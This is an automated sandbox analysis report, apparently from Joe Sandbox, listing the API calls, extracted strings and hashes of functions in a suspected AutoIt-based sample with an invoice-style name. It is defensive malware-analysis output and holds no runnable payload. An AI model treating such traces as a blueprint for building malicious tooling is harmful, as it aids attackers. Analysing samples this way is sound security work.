                                      • LoadCursorW.USER32(00000000,00007F02), ref: 00987A60
                                      • LoadCursorW.USER32(00000000,00007F89), ref: 00987A6B
                                      • GetCursorInfo.USER32(?), ref: 00987A7B
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: Cursor$Load$Info
                                      • String ID:
                                      • API String ID: 2577412497-0
                                      • Opcode ID: f7afd0ae4f4ab72c692677f88fc2281aad884ef4a6ca1c431ab40d637eabf477
                                      • Instruction ID: 035f0be8a079cfccc333f8b4e33d34820b190362ea31300d549ed6cccbe1e046
                                      • Opcode Fuzzy Hash: f7afd0ae4f4ab72c692677f88fc2281aad884ef4a6ca1c431ab40d637eabf477
                                      • Instruction Fuzzy Hash: 2B3103B1D4831A6ADB109FF68C8999FFFECFF04750F50452AA50DE7280DA78A5008FA1
                                      Function 0093C833 Relevance: 25.0, APIs: 7, Strings: 7, Instructions: 479COMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 0094E968: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,0093C8B7,?,00002000,?,?,00000000,?,0093419E,?,?,?,009CDC00), ref: 0094E984
                                        • Part of subcall function 0093660F: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,009353B1,?,?,009361FF,?,00000000,00000001,00000000), ref: 0093662F
                                      • __wsplitpath.LIBCMT ref: 0093C93E
                                        • Part of subcall function 00951DFC: __wsplitpath_helper.LIBCMT ref: 00951E3C
                                      • _wcscpy.LIBCMT ref: 0093C953
                                      • _wcscat.LIBCMT ref: 0093C968
                                      • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,00000001,?,?,00000000), ref: 0093C978
                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 0093CABE
                                        • Part of subcall function 0093B337: _wcscpy.LIBCMT ref: 0093B36F
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: CurrentDirectory$_wcscpy$FullNamePath__wsplitpath__wsplitpath_helper_wcscat
                                      • String ID: #include depth exceeded. Make sure there are no recursive includes$>>>AUTOIT SCRIPT<<<$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
                                      • API String ID: 2258743419-1018226102
                                      • Opcode ID: ecd7392705b9c4b1af33034266f7eac32d6088f56a06ee4bc6fb1995a0113c4d
                                      • Instruction ID: bcbbe3b7a51c6883b66513ecbdeedea419b77691292e70fceaf251ad2d39f36e
                                      • Opcode Fuzzy Hash: ecd7392705b9c4b1af33034266f7eac32d6088f56a06ee4bc6fb1995a0113c4d
                                      • Instruction Fuzzy Hash: B51270715083419FC724EF24C851AAFBBE9AFD9304F44891EF589A3261DB30DA49CF92
                                      Function 0099CE58 Relevance: 24.7, APIs: 12, Strings: 2, Instructions: 205windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • _memset.LIBCMT ref: 0099CEFB
                                      • DestroyWindow.USER32(?,?), ref: 0099CF73
                                      • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 0099CFF4
                                      • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 0099D016
                                      • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0099D025
                                      • DestroyWindow.USER32(?), ref: 0099D042
                                      • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00930000,00000000), ref: 0099D075
                                      • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0099D094
                                      • GetDesktopWindow.USER32 ref: 0099D0A9
                                      • GetWindowRect.USER32(00000000), ref: 0099D0B0
                                      • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 0099D0C2
                                      • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 0099D0DA
                                        • Part of subcall function 0094B526: GetWindowLongW.USER32(?,000000EB), ref: 0094B537
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memset
                                      • String ID: 0$tooltips_class32
                                      • API String ID: 3877571568-3619404913
                                      • Opcode ID: 79b134b2c731ab549a9419ec4a591c1b0d37760f529c5199d9ad42b84a72fdf6
                                      • Instruction ID: d4b1ad581b7d62b8b443e19d4431589ebafde469ad32c1ab6152bafa66669a7d
                                      • Opcode Fuzzy Hash: 79b134b2c731ab549a9419ec4a591c1b0d37760f529c5199d9ad42b84a72fdf6
                                      • Instruction Fuzzy Hash: 4E71EEB0155305AFDB20CF28CC85FB67BE9EB88704F04461DF985872A1DB30E942DB62
                                      Function 0097AAF8 Relevance: 23.1, APIs: 11, Strings: 2, Instructions: 374timeCOMMON
                                      Download Yara Rule
                                      APIs
                                      • VariantInit.OLEAUT32(00000000), ref: 0097AB3D
                                      • VariantCopy.OLEAUT32(?,?), ref: 0097AB46
                                      • VariantClear.OLEAUT32(?), ref: 0097AB52
                                      • VariantTimeToSystemTime.OLEAUT32(?,?,?), ref: 0097AC40
                                      • __swprintf.LIBCMT ref: 0097AC70
                                      • VarR8FromDec.OLEAUT32(?,?), ref: 0097AC9C
                                      • VariantInit.OLEAUT32(?), ref: 0097AD4D
                                      • SysFreeString.OLEAUT32(00000016), ref: 0097ADDF
                                      • VariantClear.OLEAUT32(?), ref: 0097AE35
                                      • VariantClear.OLEAUT32(?), ref: 0097AE44
                                      • VariantInit.OLEAUT32(00000000), ref: 0097AE80
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: Variant$ClearInit$Time$CopyFreeFromStringSystem__swprintf
                                      • String ID: %4d%02d%02d%02d%02d%02d$Default
                                      • API String ID: 3730832054-3931177956
                                      • Opcode ID: b62da3572292c4f0d57fc04f98c916205bbe0ca8c0c9803c82b86abb1a4eef45
                                      • Instruction ID: e76a3b9502363ccec4ceb278a3de7aea507f9d4cd3307aaa46ff5b5a3a32b91d
                                      • Opcode Fuzzy Hash: b62da3572292c4f0d57fc04f98c916205bbe0ca8c0c9803c82b86abb1a4eef45
                                      • Instruction Fuzzy Hash: 68D1EF72A04606EFCB249F65C885B6EB7BAFF84710F14C855E4099B1D0DB78EC44DBA2
                                      Function 0099716A Relevance: 23.0, APIs: 2, Strings: 11, Instructions: 244windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • CharUpperBuffW.USER32(?,?), ref: 009971FC
                                      • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00997247
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: BuffCharMessageSendUpper
                                      • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                      • API String ID: 3974292440-4258414348
                                      • Opcode ID: 126c32149a44f11b92e58cdaa1c9efe255bda6bba5b154cd1454c42a47f2a62e
                                      • Instruction ID: 15b090e021fa68253bf5682730d17cd3d155deacbc5cb85aa2bba571d4d7d830
                                      • Opcode Fuzzy Hash: 126c32149a44f11b92e58cdaa1c9efe255bda6bba5b154cd1454c42a47f2a62e
                                      • Instruction Fuzzy Hash: AA915D746187019BCB14EF64C891B6EB7A5BF94310F004869F8966B3A3DF74ED0ACB91
                                      Function 0099E4F5 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 199windowlibraryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 0099E5AB
                                      • LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,0099BEAF), ref: 0099E607
                                      • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 0099E647
                                      • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 0099E68C
                                      • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 0099E6C3
                                      • FreeLibrary.KERNEL32(?,00000004,?,?,?,?,0099BEAF), ref: 0099E6CF
                                      • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0099E6DF
                                      • DestroyCursor.USER32(?), ref: 0099E6EE
                                      • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 0099E70B
                                      • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 0099E717
                                        • Part of subcall function 00950FA7: __wcsicmp_l.LIBCMT ref: 00951030
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: Load$Image$LibraryMessageSend$CursorDestroyExtractFreeIcon__wcsicmp_l
                                      • String ID: .dll$.exe$.icl
                                      • API String ID: 3907162815-1154884017
                                      • Opcode ID: eccb1a1494c66b992f2bcfa094036f13f80ff45f9b5bb8b595e3ad6b79d5edfe
                                      • Instruction ID: c0246c518260737b9ffd0f47abf99e79cbad18a04b6fe012f2e7f30663b6efc4
                                      • Opcode Fuzzy Hash: eccb1a1494c66b992f2bcfa094036f13f80ff45f9b5bb8b595e3ad6b79d5edfe
                                      • Instruction Fuzzy Hash: 7861BF71500215BAEF24DF68CD86FFE77ACBB18725F104615F915D60D0EBB4A980DBA0
                                      Function 0097D219 Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 138COMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 0093936C: __swprintf.LIBCMT ref: 009393AB
                                        • Part of subcall function 0093936C: __itow.LIBCMT ref: 009393DF
                                      • CharLowerBuffW.USER32(?,?), ref: 0097D292
                                      • GetDriveTypeW.KERNEL32 ref: 0097D2DF
                                      • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0097D327
                                      • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0097D35E
                                      • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0097D38C
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: SendString$BuffCharDriveLowerType__itow__swprintf
                                      • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                      • API String ID: 1148790751-4113822522
                                      • Opcode ID: 0c08be06b109cc35dc431812fb8b2a1dce20aa478ee225c0cb223504e34261db
                                      • Instruction ID: e584ae27b95a3f5c14b24fe2d37453ed02eae276ac975fdaf27967cf3fbf2b21
                                      • Opcode Fuzzy Hash: 0c08be06b109cc35dc431812fb8b2a1dce20aa478ee225c0cb223504e34261db
                                      • Instruction Fuzzy Hash: F15128B1504205AFC700EF11C981A6AB7F8FF98718F00896DF89AA7251DB31EE06CF52
                                      Function 009726BC Relevance: 22.9, APIs: 8, Strings: 5, Instructions: 137windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000016,00000000,?,?,009A3973,00000016,0000138C,00000016,?,00000016,009CDDB4,00000000,?), ref: 009726F1
                                      • LoadStringW.USER32(00000000,?,009A3973,00000016), ref: 009726FA
                                      • GetModuleHandleW.KERNEL32(00000000,00000016,?,00000FFF,?,?,009A3973,00000016,0000138C,00000016,?,00000016,009CDDB4,00000000,?,00000016), ref: 0097271C
                                      • LoadStringW.USER32(00000000,?,009A3973,00000016), ref: 0097271F
                                      • __swprintf.LIBCMT ref: 0097276F
                                      • __swprintf.LIBCMT ref: 00972780
                                      • _wprintf.LIBCMT ref: 00972829
                                      • MessageBoxW.USER32(00000000,?,?,00011010), ref: 00972840
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: HandleLoadModuleString__swprintf$Message_wprintf
                                      • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                      • API String ID: 618562835-2268648507
                                      • Opcode ID: 89f761f2270f6f6a04bdba08727307cce1b0cd28446abef1a86f5ab8e5e30a06
                                      • Instruction ID: 3f2bdc1877bb2845fb9adbba9e4d7b3bac2e70ca1f6cb7b7c85c157e5349b4f6
                                      • Opcode Fuzzy Hash: 89f761f2270f6f6a04bdba08727307cce1b0cd28446abef1a86f5ab8e5e30a06
                                      • Instruction Fuzzy Hash: AA412D72804219ABCB15FBE0DE86FEEB778AF98344F104065B50676092EA216F09DF61
                                      Function 0097D0B8 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 101fileCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 0097D0D8
                                      • __swprintf.LIBCMT ref: 0097D0FA
                                      • CreateDirectoryW.KERNEL32(?,00000000), ref: 0097D137
                                      • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 0097D15C
                                      • _memset.LIBCMT ref: 0097D17B
                                      • _wcsncpy.LIBCMT ref: 0097D1B7
                                      • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 0097D1EC
                                      • CloseHandle.KERNEL32(00000000), ref: 0097D1F7
                                      • RemoveDirectoryW.KERNEL32(?), ref: 0097D200
                                      • CloseHandle.KERNEL32(00000000), ref: 0097D20A
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
                                      • String ID: :$\$\??\%s
                                      • API String ID: 2733774712-3457252023
                                      • Opcode ID: 00f4a1a8b29f5e14033d5cf025c4856411e14598586b54d303a11590eb883ce1
                                      • Instruction ID: 8a8507f3f73fa83bff46e5dffd65ff2ced0c426d1d7ca3025876877017cd58d1
                                      • Opcode Fuzzy Hash: 00f4a1a8b29f5e14033d5cf025c4856411e14598586b54d303a11590eb883ce1
                                      • Instruction Fuzzy Hash: 3231EFB291410AABDB20DFA0CC48FEB37BCEF89710F1081B6F919D21A1E77096458B24
                                      Function 0099E731 Relevance: 22.6, APIs: 15, Instructions: 129filecommemoryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,0099BEF4,?,?), ref: 0099E754
                                      • GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,0099BEF4,?,?,00000000,?), ref: 0099E76B
                                      • GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,0099BEF4,?,?,00000000,?), ref: 0099E776
                                      • CloseHandle.KERNEL32(00000000,?,?,?,?,0099BEF4,?,?,00000000,?), ref: 0099E783
                                      • GlobalLock.KERNEL32(00000000), ref: 0099E78C
                                      • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?,?,0099BEF4,?,?,00000000,?), ref: 0099E79B
                                      • GlobalUnlock.KERNEL32(00000000), ref: 0099E7A4
                                      • CloseHandle.KERNEL32(00000000,?,?,?,?,0099BEF4,?,?,00000000,?), ref: 0099E7AB
                                      • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 0099E7BC
                                      • OleLoadPicture.OLEAUT32(?,00000000,00000000,009BD9BC,?), ref: 0099E7D5
                                      • GlobalFree.KERNEL32(00000000), ref: 0099E7E5
                                      • GetObjectW.GDI32(00000000,00000018,?), ref: 0099E809
                                      • CopyImage.USER32(00000000,00000000,?,?,00002000), ref: 0099E834
                                      • DeleteObject.GDI32(00000000), ref: 0099E85C
                                      • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 0099E872
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                      • String ID:
                                      • API String ID: 3840717409-0
                                      • Opcode ID: 026c29cd359138096127db9410a6a61cc75568188ee18acc78cad1380f25e9b0
                                      • Instruction ID: 18f2ab32f4b4fada7587efbae8645843e91e9b6abe8ab4937c0e3318ee2e42d8
                                      • Opcode Fuzzy Hash: 026c29cd359138096127db9410a6a61cc75568188ee18acc78cad1380f25e9b0
                                      • Instruction Fuzzy Hash: 9F415975601204FFDB11DFA9CD88EAE7BB8EB89B25F104158F905D6260E7309900DB20
                                      Function 009805F8 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 230COMMON
                                      Download Yara Rule
                                      APIs
                                      • __wsplitpath.LIBCMT ref: 0098076F
                                      • _wcscat.LIBCMT ref: 00980787
                                      • _wcscat.LIBCMT ref: 00980799
                                      • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 009807AE
                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 009807C2
                                      • GetFileAttributesW.KERNEL32(?), ref: 009807DA
                                      • SetFileAttributesW.KERNEL32(?,00000000), ref: 009807F4
                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 00980806
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: CurrentDirectory$AttributesFile_wcscat$__wsplitpath
                                      • String ID: *.*
                                      • API String ID: 34673085-438819550
                                      • Opcode ID: d09e357e6c7278d4f892b9101bb5e57ecd0ed3a2f23afee0bb3ae99eb8526fec
                                      • Instruction ID: f841f3515a089237af05dac88ec6c7a43e69bfc18d351efc60674cd255415d3e
                                      • Opcode Fuzzy Hash: d09e357e6c7278d4f892b9101bb5e57ecd0ed3a2f23afee0bb3ae99eb8526fec
                                      • Instruction Fuzzy Hash: 63818F725043019FCBA4EF64C845A6EB7E8BBC8314F148D2EF889D7351E735D9588B92
                                      Function 0096A867 Relevance: 21.2, APIs: 14, Instructions: 178memoryCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 0096ABBB: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 0096ABD7
                                        • Part of subcall function 0096ABBB: GetLastError.KERNEL32(?,0096A69F,?,?,?), ref: 0096ABE1
                                        • Part of subcall function 0096ABBB: GetProcessHeap.KERNEL32(00000008,?,?,0096A69F,?,?,?), ref: 0096ABF0
                                        • Part of subcall function 0096ABBB: RtlAllocateHeap.NTDLL(00000000,?,0096A69F), ref: 0096ABF7
                                        • Part of subcall function 0096ABBB: GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 0096AC0E
                                        • Part of subcall function 0096AC56: GetProcessHeap.KERNEL32(00000008,0096A6B5,00000000,00000000,?,0096A6B5,?), ref: 0096AC62
                                        • Part of subcall function 0096AC56: RtlAllocateHeap.NTDLL(00000000,?,0096A6B5), ref: 0096AC69
                                        • Part of subcall function 0096AC56: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,0096A6B5,?), ref: 0096AC7A
                                      • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 0096A8CB
                                      • _memset.LIBCMT ref: 0096A8E0
                                      • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 0096A8FF
                                      • GetLengthSid.ADVAPI32(?), ref: 0096A910
                                      • GetAce.ADVAPI32(?,00000000,?), ref: 0096A94D
                                      • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 0096A969
